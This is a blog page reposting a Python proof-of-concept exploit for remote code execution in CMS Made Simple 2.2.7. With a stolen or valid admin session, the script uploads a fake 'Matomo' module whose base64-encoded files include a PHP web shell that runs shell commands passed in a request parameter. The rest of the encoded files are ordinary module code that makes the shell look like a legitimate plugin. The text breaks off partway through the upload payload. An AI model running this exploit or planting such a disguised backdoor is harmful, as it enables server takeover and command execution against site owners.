Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863587830

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: CMS Made Simple 2.2.7 - Remote Code Execution
# Date: 2018-11-04
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-10517

# 1. Description: 
# An attacker or a malicious user with access to the administration interface can execute code on the server.

# 2. Proof of Concept:

import requests

# target configuration (required admin credentials in order to obtain a valid session)

target_url="<YOUR HTTP(S):// URL>"
session_cookie = "<YOUR SESSION COOKIE NAME>"
session_value = "<YOUR SESSION COOKIE VALUE>"

# upload of shell unde the name of Matomo plugin

burp0_url = target_url + "/admin/moduleinterface.php"

burp0_cookies = {session_cookie: session_value}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://gk1v1ml3nfrd1bs00o69fmwnh.public2.attackdefenselabs.com/", "Content-Type": "multipart/form-data; boundary=---------------------------207726338310671742711263591267", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
burp0_data="-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"mact\"\r\n\r\nModuleManager,m1_,local_import,0\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"__c\"\r\n\r\n9a63802b6c4579cc01c\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"m1_upload\"; filename=\"test.xml\"\r\nContent-Type: text/xml\r\n\r\n<module>\n    <dtdversion>1.3</dtdversion>\n    <name>Matomo</name>\n    <version>0.0.1</version>\n    <mincmsversion>2.1.5</mincmsversion>\n    <help><![CDATA[LS0gTWlzc2luZyBMYW5ndWFnZXN0cmluZzogaGVscCAtLQ==]]></help>\n    <about><![CDATA[PGJyIC8+QXV0aG9yOiBleWVkZWUtbWVkaWEgJmx0O21vcnRlbkBwb3Vsc2VuLm9yZyZndDs8YnIgLz48YnIgLz5WZXJzaW9uOiAwLjAuMTxiciAvPjxiciAvPkNoYW5nZSBIaXN0b3J5OjxiciAvPi0tIE1pc3NpbmcgTGFuZ3VhZ2VzdHJpbmc6IGNoYW5nZWxvZyAtLTxiciAvPg==]]></about>\n    <description><![CDATA[-- Missing Languagestring: admindescription --]]></description>\n    <file>\n      <filename>/</filename>\n      <isdir>1</isdir>\n    </file>\n    <file>\n      <filename>/action.admin_settings.php</filename>\n      <isdir>0</isdir>\n      <data><![CDATA[PCEtLSBTaW1wbGUgUEhQIEJhY2tkb29yIEJ5IERLIChPbmUtTGluZXIgVmVyc2lvbikgLS0+DQo8IS0tIFVzYWdlOiBodHRwOi8vdGFyZ2V0LmNvbS9zaW1wbGUtYmFja2Rvb3IucGhwP2NtZD1jYXQrL2V0Yy9wYXNzd2QgLS0+DQo8P3BocCBpZihpc3NldCgkX1JFUVVFU1RbJ2NtZCddKSl7IGVjaG8gIjxwcmU+IjsgJGNtZCA9ICgkX1JFUVVFU1RbJ2NtZCddKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pg==]]></data>\n    </file>\n    <file>\n      <filename>/action.admin_statistics.php</filename>\n      <isdir>0</isdir>\n      <data><![CDATA[PD9waHANCmlmICghZnVuY3Rpb25fZXhpc3RzKCJjbXNtcyIpKSByZXR1cm47DQokYXBpdG9rZW4gPSR0aGlzLT5HZXRQcmVmZXJlbmNlKCJhcGl0b2tlbiIpOw0KJHNpdGVpZD0kdGhpcy0+R2V0UHJlZmVyZW5jZSgic2l0ZWlkIik7DQokbGFuZ3VhZ2U9JHRoaXMtPkdldFByZWZlcmVuY2UoImxhbmd1YWdlIiwiZW4iKTsNCg0KJGVtYmVkX2Rhc2hib2FyZCA9ICc8aWZyYW1lIHN0eWxlPSJkaXNwbGF5OmJsb2NrOyIgc3JjPSInIC4gJHRoaXMtPkdldFByZWZlcmVuY2UoImJhc2V1cmwiKQ0KICAuICcvaW5kZXgucGhwP21vZHVsZT1XaWRnZXRpemUmYWN0aW9uPWlmcmFtZSZtb2R1bGVUb1dpZGdldGl6ZT1EYXNoYm9hcmQmYWN0aW9uVG9XaWRnZXRpemU9aW5kZXgmaWRTaXRlPScgLiAkc2l0ZWlkDQogIC4gJyZ0b2tlbl9hdXRoPScgLiAkYXBpdG9rZW4NCiAgLiAnJnBlcmlvZD1tb250aCcNCiAgLiAnJmRhdGU9dG9kYXknDQogIC4gJyZsYW5ndWFnZT0nLiRsYW5ndWFnZQ0KICAuICciIGZyYW1lYm9yZGVyPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIG1hcmdpbndpZHRoPSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI4MDBweCcNCiAgLiAnIj48L2lmcmFtZT4nOw0KDQoNCmVjaG8gJGVtYmVkX2Rhc2hib2FyZDsNCg0KDQoNCi8qDQplY2hvICR0aGlzLT5TdGFydFRhYkhlYWRlcnMoKTsNCg0KZWNobyAkdGhpcy0+U2V0VGFiSGVhZGVyKCJiYXNlIiwiU2lkZXIiLCgkdGFiPT0icGFnZXMiKSk7DQplY2hvICR0aGlzLT5TZXRUYWJIZWFkZXIoInNla3Rpb25lciIsIlNla3Rpb25lciIsKCR0YWI9PSJzZWN0aW9ucyIpKTsNCi8vICBlY2hvICR0aGlzLT5TZXRUYWJIZWFkZXIoImluZHN0aWxsaW5nZXIiLCJJbmRzdGlsbGluZ2VyIiwoJHRhYj09InNldHRpbmdzIikpOw0KZWNobyAkdGhpcy0+RW5kVGFiSGVhZGVycygpOw0KDQplY2hvICR0aGlzLT5TdGFydFRhYkNvbnRlbnQoKTsNCmVjaG8gJHRoaXMtPlN0YXJ0VGFiKCJzaWRlciIpOw0KDQplY2hvICR0aGlzLT5FbmRUYWIoKTsNCg0KZWNobyAkdGhpcy0+U3RhcnRUYWIoInNla3Rpb25lciIpOw0KDQplY2hvICR0aGlzLT5FbmRUYWIoKTsNCg0KLyoNCmVjaG8gJHRoaXMtPlN0YXJ0VGFiKCJ1cGxvYWQiKTsNCiAgaW5jbHVkZV9vbmNlKGRpcm5hbWUoX19maWxlX18pLiIvdGFiLmluZHN0aWxsaW5nZXIucGhwIik7DQogIGVjaG8gJHRoaXMtPkVuZFRhYigpOw0KKi8NCi8vZWNobyAkdGhpcy0+RW5kVGFiQ29udGVudCgpOw0KDQoNCg0KLyoNCiRhcGl0b2tlbiA9JHRoaXMtPkdldFByZWZlcmVuY2UoImFwaXRva2VuIik7DQokc2l0ZWlkPSR0aGlzLT5HZXRQcmVmZXJlbmNlKCJzaXRlaWQiKTsNCg0KLy8gd2UgY2FsbCB0aGUgUkVTVCBBUEkgYW5kIHJlcXVlc3QgdGhlIDEwMCBmaXJzdCBrZXl3b3JkcyBmb3IgdGhlIGxhc3QgbW9udGggZm9yIHRoZSBpZHNpdGU9Nw0KJHVybCA9ICR0aGlzLT5HZXRQcmVmZXJlbmNlKCJiYXNldXJsIik7DQokdXJsIC49ICI/bW9kdWxlPUFQSSZtZXRob2Q9UmVmZXJyZXJzLmdldEtleXdvcmRzIjsNCiR1cmwgLj0gIiZpZFNpdGU9JHNpdGVpZCZwZXJpb2Q9bW9udGgmZGF0ZT15ZXN0ZXJkYXkiOw0KJHVybCAuPSAiJmZvcm1hdD1QSFAmZmlsdGVyX2xpbWl0PTIwIjsNCiR1cmwgLj0gIiZ0b2tlbl9hdXRoPSRhcGl0b2tlbiI7DQoNCiRmZXRjaGVkID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7DQovL2VjaG8gJGZldGNoZWQ7cmV0dXJuOw0KJGNvbnRlbnQgPSB1bnNlcmlhbGl6ZSgkZmV0Y2hlZCk7DQovL3ByaW50X3IoJGNvbnRlbnQpO3JldHVybjsNCg0KLy8gY2FzZSBlcnJvcg0KaWYgKCEkY29udGVudCkgew0KICBwcmludCgiRXJyb3IgcGFyc2luZyBkYXRhLCBjb250ZW50IGZldGNoZWQgPSAiIC4gJGZldGNoZWQpOw0KICByZXR1cm47DQp9DQoNCmlmICgkY29udGVudFsicmVzdWx0Il09PSJlcnJvciIpIHsNCiAgcHJpbnQoIkVycm9yLCBtZXNzYWdlID0gIiAuICRjb250ZW50WyJtZXNzYWdlIl0pOw0KICByZXR1cm47DQp9DQoNCnByaW50KCI8aDE+S2V5d29yZHMgZm9yIHRoZSBsYXN0IG1vbnRoPC9oMT5cbiIpOw0KZm9yZWFjaCAoJGNvbnRlbnQgYXMgJHJvdykgew0KICAka2V5d29yZCA9IGh0bWxzcGVjaWFsY2hhcnMoaHRtbF9lbnRpdHlfZGVjb2RlKHVybGRlY29kZSgkcm93WydsYWJlbCddKSwgRU5UX1FVT1RFUywgJ1VURi04JyksIEVOVF9RVU9URVMsICdVVEYtOCcpOw0KICAkaGl0cyA9ICRyb3dbJ25iX3Zpc2l0cyddOw0KDQogIHByaW50KCI8Yj4ka2V5d29yZDwvYj4gKCRoaXRzIGhpdHMpPGJyPlxuIik7DQp9DQoqLw0K]]></data>\n    </file>\n    <file>\n      <filename>/action.default.php</filename>\n      <isdir>0</isdir>\n      <data><![CDATA[PD9waHANCg0KZWNobyAkdGhpcy0+TmVvUHJvY2Vzc1RlbXBsYXRlRnJvbURhdGEoJHRoaXMtPkdldFRyYWNraW5nQ29kZSgpKTs=]]></data>\n    </file>\n    <file>\n      <filename>/action.savesettings.php</filename>\n      <isdir>0</isdir>\n      <data><![CDATA[PD9waHANCmlmICghZnVuY3Rpb25fZXhpc3RzKCJjbXNtcyIpKSByZXR1cm47DQppZiggISR0aGlzLT5DaGVja1Blcm1pc3Npb24oJ01vZGlmeSBTaXRlIFByZWZlcmVuY2VzJykgKSByZXR1cm47DQoNCg0KJHRoaXMtPk5lb1NhdmVWYWx1ZXMoJHBhcmFtcyxhcnJheSgNCiAgImJhc2V1cmwiLA0KICAidHJhY2tpbmdjb2RlIiwNCiAgImFwaXRva2VuIiwNCiAgInNpdGVpZCINCikpOw0KDQokdGhpcy0+UmVkaXJlY3QoJGlkLCAnYWRtaW5fc2V0dGluZ3MnLCAkcmV0dXJuaWQsYXJyYXkoInRhYiI9PiJzZXR0aW5ncyIsIm1vZHVsZV9tZXNzYWdlIj0+JHRoaXMtPkxhbmcoInNldHRpbmdzc2F2ZWQiKSkpOw0K]]></data>\n    </file>\n    <file>\n      <filename>/lang/</filename>\n      <isdir>1</isdir>\n    </file>\n    <file>\n      <filename>/lang/en_US.php</filename>\n      <isdir>0</isdir>\n      <data><![CDATA[PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIFVzZXI6IG1vcnRlbg0KICogRGF0ZTogMjctMDktMjAxOA0KICogVGltZTogMDg6NTMNCiAqLw0KDQoNCiRsYW5nWyJ0aXRsZV9zdGF0aXN0aWNzIl09Ik1hdG9tbyBTdGF0aXN0aWNzIjsNCiRsYW5nWyJ0aXRsZV9zZXR0aW5ncyJdPSJNYXRvbW8gU2V0dGluZ3MiOw0KDQokbGFuZ1siYmFzZXVybCJdPSJCYXNlIFVSTCI7DQokbGFuZ1siYmFzZXVybGhlbHAiXT0iVGhlIGJhc2UgdXJsIG9mIHRoZSBNYXRvbW8taW5zdGFsbGF0aW9uLiBQbGVhc2UgaW5jbHVkZSBodHRwOi8vIG9yIGh0dHBzOi8vIjsNCiRsYW5nWyJhcGl0b2tlbiJdPSJBUEkgdG9rZW4iOw0KJGxhbmdbImFwaXRva2VuaGVscCJdPSJUaGUgQVBJIHRva2VuIGZvciBhY2Nlc3NpbmcgTWF0b21vLiBDYW4gYmUgb2J0YWluZWQgYWZ0ZXIgbG9nZ2luZyBpbnRvIHRoZSBNYXRvbW8gaW5zdGFsbGF0aW9uIjsNCiRsYW5nWyJzaXRlaWQiXT0iU2l0ZSBJRCI7DQokbGFuZ1sic2l0ZWlkaGVscCJdPSJUaGUgSUQgb2YgdGhlIHNpdGUgYXMgc2VlbiBieSB0aGUgTWF0b21vIGluc3RhbGxhdGlvbiI7DQokbGFuZ1sidHJhY2tpbmdjb2RlIl09IlRyYWNraW5nIGNvZGUiOw0KJGxhbmdbInRyYWNraW5nY29kZWhlbHAiXT0iVGhlIHRyYWNraW5nIGNvZGUgZnJvbSBNYXRvbW8gKHRoaXMgd2lsbCBwcm9iYWJseSBiZSBhdXRvZ2VuZXJhdGVkIGF0IGEgbGF0ZXIgdmVyc2lvbikiOw0KJGxhbmdbInNhdmVzZXR0aW5ncyJdPSJTYXZlIHNldHRpbmdzIjsNCiRsYW5nWyJzZXR0aW5nc3NhdmVkIl09IlNldHRpbmdzIHNhdmVkIjs=]]></data>\n    </file>\n    <file>\n      <filename>/Matomo.module.php</filename>\n      <isdir>0</isdir>\n      <data><![CDATA[PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIFVzZXI6IG1vcnRlbg0KICogRGF0ZTogMjctMDktMjAxOA0KICogVGltZTogMDg6NTANCiAqLw0KDQoNCmNsYXNzIE1hdG9tbyBleHRlbmRzIENNU01vZHVsZQ0Kew0KDQogIC8qKg0KICAgKg0KICAgKiBAdmFyIHN0cmluZw0KICAgKi8NCiAgcHJvdGVjdGVkICRtZXRhZGF0YSA9IG51bGw7DQogIHByb3RlY3RlZCAkX19lcnJvcnMgPSBudWxsOw0KICBwcm90ZWN0ZWQgJF9fbWVzc2FnZXMgPSBudWxsOw0KDQogIC8qICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiogQ09OU1RSVUNUT1IgKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiAqLw0KICBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoKQ0KICB7DQogICAgcGFyZW50OjpfX2NvbnN0cnVjdCgpOw0KDQogICAgLypzcGxfYXV0b2xvYWRfcmVnaXN0ZXIoYXJyYXkoDQogICAgICAmJHRoaXMsDQogICAgICAnX2F1dG9sb2FkZXInDQogICAgKSk7DQoNCiAgICAkc21hcnR5ID0gU21hcnR5X0NNUzo6Z2V0X2luc3RhbmNlKCk7DQogICAgaWYgKCRzbWFydHkpIHsNCiAgICAgICRzbWFydHktPnJlZ2lzdGVyQ2xhc3MoJ2htX3NtYXJ0eScsICdITV9TbWFydHknKTsNCiAgICAgICRzbWFydHktPnJlZ2lzdGVyUmVzb3VyY2UoJ2htX3RwbCcsIG5ldyBITV9UZW1wbGF0ZVJlc291cmNlKCkpOw0KICAgIH0qLw0KICB9DQoNCiAgLyoqDQogICAqIEEgc2ltcGxlIGF1dG9sb2FkZXIgZm9yIGNsYXNzIGZpbGVzLg0KICAgKg0KICAgKiBAcGFyYW0gc3RyaW5nICRuYW1lIGNsYXNzIG5hbWUNCiAgICovDQogIC8qcHJpdmF0ZSBmaW5hbCBmdW5jdGlvbiBfYXV0b2xvYWRlcigkbmFtZSkNCiAgew0KICAgICRjbGFzc0ZpbGUgPSAkdGhpcy0+R2V0TW9kdWxlUGF0aCgpIC4gJy9saWIvJyAuIHN0cl9yZXBsYWNlKCdfJywgJy8nLCAkbmFtZSkgLiAnLnBocCc7DQogICAgaWYgKGZpbGVfZXhpc3RzKCRjbGFzc0ZpbGUpKSB7DQogICAgICByZXF1aXJlX29uY2UgJGNsYXNzRmlsZTsNCiAgICB9DQogIH0qLw0KDQogIC8qICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiogTU9EVUxFIENPTkZJRyAqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqICovDQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpHZXRGcmllbmRseU5hbWUoKQ0KICAgKi8NCiAgcHVibGljIGZ1bmN0aW9uIEdldEZyaWVuZGx5TmFtZSgpDQogIHsNCiAgICByZXR1cm4gJHRoaXMtPkxhbmcoJ2ZyaWVuZGx5bmFtZScpOw0KICB9DQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpHZXRWZXJzaW9uKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBHZXRWZXJzaW9uKCkNCiAgew0KICAgIHJldHVybiAnMC4wLjEnOw0KICB9DQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpNaW5pbXVtQ01TVmVyc2lvbigpDQogICAqLw0KICBwdWJsaWMgZnVuY3Rpb24gTWluaW11bUNNU1ZlcnNpb24oKQ0KICB7DQogICAgcmV0dXJuICIyLjEuNSI7DQogIH0NCg0KICAvKg0KICAgKiAobm9uLVBIUGRvYykgQHNlZSBDTVNNb2R1bGU6Ok1heGltdW1DTVNWZXJzaW9uKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBNYXhpbXVtQ01TVmVyc2lvbigpDQogIHsNCiAgICByZXR1cm4gIjMiOw0KICB9DQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpHZXRIZWxwKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBHZXRIZWxwKCkNCiAgew0KICAgIHJldHVybiAkdGhpcy0+TGFuZygnaGVscCcpOw0KICB9DQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpHZXRBdXRob3IoKQ0KICAgKi8NCiAgcHVibGljIGZ1bmN0aW9uIEdldEF1dGhvcigpDQogIHsNCiAgICByZXR1cm4gJ2V5ZWRlZS1tZWRpYSc7DQogIH0NCg0KICAvKg0KICAgKiAobm9uLVBIUGRvYykgQHNlZSBDTVNNb2R1bGU6OkdldEF1dGhvckVtYWlsKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBHZXRBdXRob3JFbWFpbCgpDQogIHsNCiAgICByZXR1cm4gJ21vcnRlbkBwb3Vsc2VuLm9yZyc7DQogIH0NCg0KICAvKg0KICAgKiAobm9uLVBIUGRvYykgQHNlZSBDTVNNb2R1bGU6OkdldENoYW5nZUxvZygpDQogICAqLw0KICBwdWJsaWMgZnVuY3Rpb24gR2V0Q2hhbmdlTG9nKCkNCiAgew0KICAgIHJldHVybiAkdGhpcy0+TGFuZygnY2hhbmdlbG9nJyk7DQogIH0NCg0KICAvKg0KICAgKiAobm9uLVBIUGRvYykgQHNlZSBDTVNNb2R1bGU6OklzUGx1Z2luTW9kdWxlKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBJc1BsdWdpbk1vZHVsZSgpDQogIHsNCiAgICByZXR1cm4gdHJ1ZTsNCiAgfQ0KDQogIC8qDQogICAqIChub24tUEhQZG9jKSBAc2VlIENNU01vZHVsZTo6SGFzQWRtaW4oKQ0KICAgKi8NCiAgcHVibGljIGZ1bmN0aW9uIEhhc0FkbWluKCkNCiAgew0KICAgIHJldHVybiB0cnVlOw0KICB9DQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpHZXRBZG1pbkRlc2NyaXB0aW9uKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBHZXRBZG1pbkRlc2NyaXB0aW9uKCkNCiAgew0KICAgIHJldHVybiAkdGhpcy0+TGFuZygnYWRtaW5kZXNjcmlwdGlvbicpOw0KICB9DQoNCiAgcHVibGljIGZ1bmN0aW9uIEdldEFkbWluTWVudUl0ZW1zKCkNCiAgew0KICAgICRvdXQgPSBhcnJheSgpOw0KDQogICAgJG9iaiA9IG5ldyBDbXNBZG1pbk1lbnVJdGVtKCk7DQogICAgJG9iai0+bW9kdWxlID0gJHRoaXMtPkdldE5hbWUoKTsNCiAgICAkb2JqLT5zZWN0aW9uID0gJ2V4dGVuc2lvbnMnOw0KICAgICRvYmotPnRpdGxlID0gJHRoaXMtPkxhbmcoJ3RpdGxlX3N0YXRpc3RpY3MnKTsNCiAgICAkb2JqLT5kZXNjcmlwdGlvbiA9ICR0aGlzLT5MYW5nKCdkZXNjX3N0YXRpc3RpY3MnKTsNCiAgICAkb2JqLT5hY3Rpb24gPSAnYWRtaW5fc3RhdGlzdGljcyc7DQogICAgJG9iai0+dXJsID0gJHRoaXMtPmNyZWF0ZV91cmwoJ20xXycsICRvYmotPmFjdGlvbik7DQogICAgJG9iai0+cHJpb3JpdHkgPSA1MDsNCiAgICAkb3V0W10gPSAkb2JqOw0KDQogICAgaWYgKCR0aGlzLT5DaGVja1Blcm1pc3Npb24oJ01vZGlmeSBTaXRlIFByZWZlcmVuY2VzJykpIHsNCiAgICAgICRvYmogPSBuZXcgQ21zQWRtaW5NZW51SXRlbSgpOw0KICAgICAgJG9iai0+bW9kdWxlID0gJHRoaXMtPkdldE5hbWUoKTsNCiAgICAgICRvYmotPnNlY3Rpb24gPSAnc2l0ZWFkbWluJzsNCiAgICAgICRvYmotPnRpdGxlID0gJHRoaXMtPkxhbmcoJ3RpdGxlX3NldHRpbmdzJyk7DQogICAgICAkb2JqLT5kZXNjcmlwdGlvbiA9ICR0aGlzLT5MYW5nKCdkZXNjX3NldHRpbmdzJyk7DQogICAgICAkb2JqLT5hY3Rpb24gPSAnYWRtaW5fc2V0dGluZ3MnOw0KICAgICAgJG9iai0+dXJsID0gJHRoaXMtPmNyZWF0ZV91cmwoJ20xXycsICRvYmotPmFjdGlvbik7DQogICAgICAkb3V0W10gPSAkb2JqOw0KICAgICAgJG9iai0+cHJpb3JpdHkgPSA1MDsNCiAgICB9DQogICAgcmV0dXJuICRvdXQ7DQogIH0NCg0KICBwdWJsaWMgZnVuY3Rpb24gSW5pdGlhbGl6ZUFkbWluICgpDQogIHt9DQoNCiAgLyoqDQogICAqIChub24tUEhQZG9jKQ0KICAgKg0KICAgKiBAc2VlIENNU01vZHVsZTo6SW5pdGlhbGl6ZUZyb250ZW5kKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBJbml0aWFsaXplRnJvbnRlbmQgKCkNCiAgew0KICAgICR0aGlzLT5SZWdpc3Rlck1vZHVsZVBsdWdpbigpOw0KDQogIC8qICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCd1c2VyJywgbnVsbCwgJHRoaXMtPkxhbmcoJ2hlbHBfdXNlcicpKTsNCiAgICAkdGhpcy0+U2V0UGFyYW1ldGVyVHlwZSgndXNlcicsIENMRUFOX0lOVCk7DQoNCiAgICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCdtb2RlbCcsIG51bGwsICR0aGlzLT5MYW5nKCdoZWxwX21vZGVsJykpOw0KICAgICR0aGlzLT5TZXRQYXJhbWV0ZXJUeXBlKCdtb2RlbCcsIENMRUFOX0lOVCk7DQoNCiAgICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCd0ZW1wbGF0ZScsIG51bGwsICR0aGlzLT5MYW5nKCdoZWxwX3RlbXBsYXRlJykpOw0KICAgICR0aGlzLT5TZXRQYXJhbWV0ZXJUeXBlKCd0ZW1wbGF0ZScsIENMRUFOX1NUUklORyk7DQoNCiAgICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCd0YXJnZXQnLCBudWxsLCAkdGhpcy0+TGFuZygnaGVscF90YXJnZXQnKSk7DQogICAgJHRoaXMtPlNldFBhcmFtZXRlclR5cGUoJ3RhcmdldCcsIENMRUFOX1NUUklORyk7DQoNCiAgICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCdwYWdlbGltaXQnLCBudWxsLCAkdGhpcy0+TGFuZygnaGVscF9wYWdlbGltaXQnKSk7DQogICAgJHRoaXMtPlNldFBhcmFtZXRlclR5cGUoJ3BhZ2VsaW1pdCcsIENMRUFOX0lOVCk7DQoNCiAgICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCdwYWdlJywgbnVsbCwgJHRoaXMtPkxhbmcoJ2hlbHBfcGFnZScpKTsNCiAgICAkdGhpcy0+U2V0UGFyYW1ldGVyVHlwZSgncGFnZScsIENMRUFOX0lOVCk7Ki8NCg0KDQogIH0NCg0KDQogIGZ1bmN0aW9uIE5lb1Byb2Nlc3NUZW1wbGF0ZSgkZmlsZW5hbWUpDQogIHsNCiAgICBpZiAoZmlsZV9leGlzdHMoZGlybmFtZShfX0ZJTEVfXykgLiAiL3RlbXBsYXRlcy8iIC4gJGZpbGVuYW1lKSkgew0KICAgICAgJGRhdGEgPSBmaWxlX2dldF9jb250ZW50cyhkaXJuYW1lKF9fRklMRV9fKSAuICIvdGVtcGxhdGVzLyIgLiAkZmlsZW5hbWUpOw0KICAgICAgLy9lY2hvICJkYXRhOiIuJGRhdGE7DQogICAgICByZXR1cm4gJHRoaXMtPk5lb1Byb2Nlc3NUZW1wbGF0ZUZyb21EYXRhKCRkYXRhKTsNCiAgICB9IGVsc2Ugew0KICAgICAgZWNobyAiSW52YWxpZCB0ZW1wbGF0ZSBmaWxlbmFtZTogIiAuICRmaWxlbmFtZTsNCiAgICB9DQogICAgcmV0dXJuICIiOw0KICB9DQoNCiAgZnVuY3Rpb24gTmVvUHJvY2Vzc1RlbXBsYXRlRnJvbURhdGEoJGRhdGEpDQogIHsNCiAgICAkc21hcnR5ID0gU21hcnR5X0NNUzo6Z2V0X2luc3RhbmNlKCk7DQogICAgcmV0dXJuICRzbWFydHktPmZldGNoKCJzdHJpbmc6IiAuICRkYXRhKTsNCg0KICB9DQoNCiAgZnVuY3Rpb24gR2V0VHJhY2tpbmdDb2RlKCkNCiAgew0KICAgIHJldHVybiAkdGhpcy0+R2V0UHJlZmVyZW5jZSgidHJhY2tpbmdjb2RlIik7DQogIH0NCg0KDQogIGZ1bmN0aW9uIE5lb1NhdmVWYWx1ZXMoJHBhcmFtcywkdmFsdWVzLCRoYW5kbGV1bnNldD0iY2xlYXIiKSB7DQogICAgLy9lY2hvICJoaSI7ZGllKCk7DQogICAgaWYgKCFpc19hcnJheSgkdmFsdWVzKSkgew0KICAgICAgaWYgKGlzc2V0KCRwYXJhbXNbJHZhbHVlc10pKSB7DQogICAgICAgICR0aGlzLT5TZXRQcmVmZXJlbmNlKCR2YWx1ZXMsJHBhcmFtc1skdmFsdWVzXSk7DQogICAgICB9IGVsc2Ugew0KICAgICAgICBzd2l0Y2ggKCRoYW5kbGV1bnNldCkgew0KICAgICAgICAgIGNhc2UgImNsZWFyIiA6ICR0aGlzLT5TZXRQcmVmZXJlbmNlKCR2YWx1ZXMsIiIpOyBicmVhazsNCiAgICAgICAgICBjYXNlICJyZW1vdmUiIDogJHRoaXMtPlJlbW92ZVByZWZlcmVuY2UoJHZhbHVlcyk7IGJyZWFrOw0KICAgICAgICAgIGRlZmF1bHQgOg0KICAgICAgICB9DQoNCiAgICAgIH0NCiAgICAgIHJldHVybjsNCiAgICB9DQogICAgZm9yZWFjaCgkdmFsdWVzIGFzICR2YWx1ZSkgew0KICAgICAgLy9lY2hvICJoaSIuJHBhcmFtc1skdmFsdWVdOyBkaWUoKTsNCiAgICAgIGlmIChpc3NldCgkcGFyYW1zWyR2YWx1ZV0pKSB7DQogICAgICAgICR0aGlzLT5TZXRQcmVmZXJlbmNlKCR2YWx1ZSwkcGFyYW1zWyR2YWx1ZV0pOw0KICAgICAgfSBlbHNlIHsNCg0KICAgICAgICBzd2l0Y2ggKCRoYW5kbGV1bnNldCkgew0KICAgICAgICAgIGNhc2UgImNsZWFyIiA6ICR0aGlzLT5TZXRQcmVmZXJlbmNlKCR2YWx1ZSwiIik7IGJyZWFrOw0KICAgICAgICAgIGNhc2UgInJlbW92ZSIgOiAkdGhpcy0+UmVtb3ZlUHJlZmVyZW5jZSgkdmFsdWUpOyBicmVhazsNCiAgICAgICAgICBkZWZhdWx0IDoNCiAgICAgICAgfQ0KICAgICAgfQ0KICAgIH0NCiAgfQ0KDQogIGZ1bmN0aW9uIHByZigkcHJlZmVyZW5jZW5hbWUsICRkZWZhdWx0dmFsdWU9IiIpIHsNCiAgICByZXR1cm4gJHRoaXMtPkdldFByZWZlcmVuY2UoJHByZWZlcmVuY2VuYW1lLCRkZWZhdWx0dmFsdWUpOw0KICB9DQp9]]></data>\n    </file>\n    <file>\n      <filename>/moduleinfo.ini</filename>\n      <isdir>0</isdir>\n      <data><![CDATA[W21vZHVsZV0KbmFtZSA9ICJNYXRvbW8iCnZlcnNpb24gPSAiMC4wLjEiCmF1dGhvciA9ICJleWVkZWUtbWVkaWEiCmF1dGhvcmVtYWlsID0gIm1vcnRlbkBwb3Vsc2VuLm9yZyIKbWluY21zdmVyc2lvbiA9ICIyLjEuNSIKbGF6eWxvYWRhZG1pbiA9IDAKbGF6eWxvYWRmcm9udGVuZCA9IDAK]]></data>\n    </file>\n    <file>\n      <filename>/templates/</filename>\n      <isdir>1</isdir>\n    </file>\n    <file>\n      <filename>/templates/adminsettings.tpl</filename>\n      <isdir>0</isdir>\n      